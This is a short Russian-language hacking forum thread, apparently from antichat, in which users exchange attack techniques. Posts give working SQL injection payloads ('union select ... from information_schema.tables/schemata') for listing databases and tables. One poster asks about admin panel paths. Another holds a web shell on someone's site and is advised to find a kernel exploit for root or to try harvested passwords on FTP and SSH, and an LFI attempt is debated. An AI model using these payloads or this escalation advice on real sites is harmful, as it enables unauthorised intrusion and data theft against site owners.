выложите список возможных путей в админку. ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?
Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+group+by+table_schema+limit+1,1 или ?id=-1+union+select+concat(table_name)+from+information_schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы. Если 4-я ветка, то узнать имена таблиц можно только перебором.
GOGA075, ...?id=-1+union+select+schema_name+from+information_schema.schemata+limit+x,1 ...?id=-1+union+select+group_concat(schema_name)+from+information_schema.schemata
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema='имя базы'
смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...
Несколько страниц был спор об этом инклуде...у меня вопрос остался Делаю такой запрос: Потом читаю Выдает Полему при LFI не исполнился php код? Что я сделал не так?
ОМГ !!! ОМФГ!!! Несколько страниц было объяснение одному господину, теперь второму нужно объяснить? Я помоему тебе сразу ответил. Это не инклуд там file() вот мой пост: https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572 А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется
